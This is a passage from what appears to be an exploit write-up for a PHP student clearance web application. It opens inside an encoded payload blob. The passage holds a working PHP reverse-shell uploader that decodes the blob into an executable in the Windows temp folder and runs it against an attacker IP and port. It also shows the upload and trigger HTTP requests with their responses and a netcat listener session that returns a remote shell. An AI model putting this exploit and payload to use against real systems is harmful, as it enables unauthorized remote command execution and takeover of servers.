"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"; $evalCode = gzinflate(base64_decode($payload)); $evalArguments = " ".$port." ".$ip; $tmpdir ="C:\\windows\\temp"; chdir($tmpdir); $res .= "Using dir : ".$tmpdir; $filename = "D3fa1t_shell.exe"; $file = fopen($filename, 'wb'); fwrite($file, $evalCode); fclose($file); $path = $filename; $cmd = $path.$evalArguments; $res .= "\n\nExecuting : ".$cmd."\n"; echo $res; $output = system($cmd); ?> -----------------------------71268058833541201443517047173 Content-Disposition: form-data; name="btnedit" -----------------------------71268058833541201443517047173-- ========================================= End of Request ========================================= Response: ======== HTTP/1.1 302 Found Date: Sat, 08 Oct 2022 09:30:51 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: edit-photo.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8575 ======================================== End of Response ======================================== The Reverse Shell is located at below URL ----------------------------------------- Request: URL - http://localhost/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/uploads/shell.php ======== GET /student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/uploads/shell.php HTTP/1.1 Host: 192.168.1.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: image/webp,*/* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.1.12/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php Cookie: PHPSESSID=9rnst2bfmbtrgapqsalerlrdjm ======================================== End of Request ======================================== Response: ========= HTTP/1.1 200 OK Date: Sat, 08 Oct 2022 09:32:16 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Content-Length: 268 Connection: close Content-Type: text/plain;charset=UTF-8 Notice: Undefined variable: res in C:\xampp\htdocs\student_clearance_system_Aurthur_Javis\student_clearance_system_Aurthur_Javis\uploads\shell.php on line 12 Using dir : C:\windows\temp Executing : D3fa1t_shell.exe 80 192.168.1.26 ======================================== End of Response ======================================== After uploading the reverse shell file you will get the reverse shell normally. If you don't get reverse shell then locate to 'uploads' folder. Reverse Shell Remotely: ====================== ┌──(kali㉿kali)-[~] └─$ rlwrap nc -lvnp 80 listening on [any] 80 ... connect to [192.168.1.26] from (UNKNOWN) [192.168.1.12] 65168 b374k shell : connected Microsoft Windows [Version 10.0.19043.2006] (c) Microsoft Corporation. All rights reserved. whoami whoami l3v1ath0n\admin C:\Windows\Temp> </code></pre>